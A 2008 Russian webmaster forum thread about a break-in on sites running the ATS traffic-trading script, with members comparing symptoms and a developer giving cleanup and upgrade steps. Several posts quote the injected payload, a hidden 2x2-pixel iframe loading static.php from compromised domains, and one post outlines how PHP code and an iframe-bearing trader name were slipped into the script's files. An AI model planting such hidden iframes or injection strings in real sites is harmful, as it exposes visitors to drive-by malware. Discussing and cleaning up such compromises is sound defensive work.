Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Очень нестандартный трейдер или взлом АТS?
Новая тема
Ответить
цитата
07/11/08 в 16:45
ciberdem
файлы установок (/settings/*.php)
цитата
07/11/08 в 18:57
Gidz
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>
это так? чей сидж? мож на него написать чего нехорошего?
цитата
07/11/08 в 19:09
miroz
Gidz писал:
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>
это так? чей сидж? мож на него написать чего нехорошего?
Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там.
цитата
07/11/08 в 19:43
SamsonS
времени мало, спешил всё сделать, но
забыл расшифровать
пароль перед заменой.
В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь?
цитата
07/11/08 в 20:32
$ilver
На нашем серваке были убиты все php файлы. Пришлось попотеть что бы все восстановить.
цитата
07/11/08 в 20:38
von Stoltz
SamsonS писал:
времени мало, спешил всё сделать, но
забыл расшифровать
пароль перед заменой.
В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь?
в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку.
цитата
07/11/08 в 20:56
mopani
Gidz писал:
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>
это так? чей сидж? мож на него написать чего нехорошего?
А у меня было вот это
Код:
<iframe src="http://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe>
Возможно это в свою очередь ранее взломаные сиджы.
цитата
07/11/08 в 21:57
Next
Закодированные в коде сиджи однозначно взломанные и используются для вставки говна через ифрейм. Так что утверждать что владельцы этих сиджев и есть уроды ошибочно!
пысы: один из моих сиджев как-то побывал в такой шкуре, кто-то понял ситуацию, ну, а кто-то (несколько тупых пендосов) тупо забанили навечно
цитата
07/11/08 в 22:00
SamsonS
von Stoltz писал:
в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку.
СЕНКС!!! всё отлично поменял
- а что делать с
subrules.txt?
цитата
07/11/08 в 23:39
von Stoltz
Итак добро пожаловать за апгрейдом на ats-project.com
Вот несколько общих рекомендаций.
Если сайт не взломан:
1. убедиться, что на корневую папку установлены права не выше 755;
2. Проапгрейдить до 1.7.2 путем замены файлов;
3. Зашифровать пароль;
4. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется временно вернуть права 777.
Если уже поломали:
1. убедиться, что на корневую папку установлены права не выше 755;
2. удалить все php файлы, которые не похожи на файлы АТС (они могут быть в папках);
3. удалить файлы /datafiles/rules.txt, datafiles/subrules.txt;
4. Проапгрейдить до 1.7.2 путем замены файлов;
5. Вычистить темплейты (можно из админки);
6. создать заново правила для трейдеров Settings - Trade Rules;
7. Зашифровать пароль;
8. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется вернуть права 777.
цитата
08/11/08 в 00:25
SamsonS
как насчет апдейта для 1.6.3 ?
цитата
08/11/08 в 00:33
Pashich
тоже интересно
цитата
08/11/08 в 00:46
Lost
тож интересно про 1.6.3
и также вопрос про апдэйт. версии 1.7 апдэйтить сразу можно на 1.7.2 рпостым перезалитием файлов?
цитата
08/11/08 в 03:43
Pashich
наверно да - просто перезалить...но!
у меня например файлы ротатора поверх скрипта стоят в 1.6.3
кстати как правильно то? у кого как?
но если сначала ротатор поставить а потом скрипт то тоже работает
хотя я ставил сначала скрипт потом ротатор
цитата
08/11/08 в 07:47
Diablo
miroz писал:
Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там.
он тоже заломан . юзают зараженные домены , как балк хосты для следующих заражений =|
тот же хакер короче , или бригада , что и ат3-атх ломали .
цитата
08/11/08 в 09:38
von Stoltz
Для 1.6.3 апдейт будет немного позже, апдейт 1.7 -> 1.7.2 тоже делается простой заменой файлов.
цитата
08/11/08 в 10:27
rusawm
лучше отпишите хозяевам этих доменов пускай эти файлы потрут
цитата
08/11/08 в 14:58
Kn
проапдейтился нормально
цитата
08/11/08 в 23:41
von Stoltz
Для тех, кто использует 1.6.3 заплатки здесь:
http://www.ats-project.com/4.rar
для PHP4
http://www.ats-project.com/5.rar
для PHP5
просто замените файлы
цитата
09/11/08 в 04:18
Burn
обновил файлы АТСа заплатками - код продолжает появляться. Почистил темплаты. Поставил права 555 на файлы и корневой каталог..
Может где-то я его не нашёл и он себя репродуцирует с каждой отработкой крона или ещё хз как..
Может я не соблюдаю очерёдность правильную ??
И когда ставлю Secured на пароль - потом не могу зайти в админку.
приходиться обновлять пасс заменой si.php
в чём может быть фишка?
Никак не могу одолеть эту хрень (((
цитата
09/11/08 в 06:19
Lin
Burn писал:
обновил файлы АТСа заплатками - код продолжает появляться.
Так видимо в обновлении пофиксили баг, тоесть не получится таким образом взломать теперь. А если какашка уже сидит на серваке, почистить надо, там выше
Soft-Com
писал как.
цитата
09/11/08 в 06:39
Burn
код больше не появляется - вроде почистил.
Топ лист отображается - нашёл причину.
Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз.
цитата
09/11/08 в 07:58
sllimm
Цитата:
удалить все php файлы, которые не похожи на файлы АТС
А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg
цитата
09/11/08 в 11:28
true
sllimm писал:
А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg
mi, bg лишнии
цитата
09/11/08 в 14:26
von Stoltz
Burn писал:
Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз.
Чтобы зашифровать пароль на файл settings/si.php должны быть права 666 или выше, после шифрования права можно уменьшить.
Как я понимаю механизм взлома, права на файлы установок особой роли не играли, критичной оказалась возможность записи в rules.txt пхп кода, а также добавление трейдера с хитрожопым названием, содержащим вызов ифрейма.
В новой версии, все эти фокусы не пройдут. Но пароль в открытом виде держать все равно не рекомендуется, а также желательно исключить возможность записи в темплейты после их создания, это, кстати относится не только к АТС, но всем скриптам ротаторов.
Необычные пхп файлы - все, отличающиеся от стандартных АТС в корне, а также в папках, где пхп файлов быть не должно: /ipfiles, /logfiles, /tradefiles
Стр.
« первая
<
3
,
4
,
5
,
6
,
7
>
последняя »
Новая тема
Ответить
Эта страница в полной версии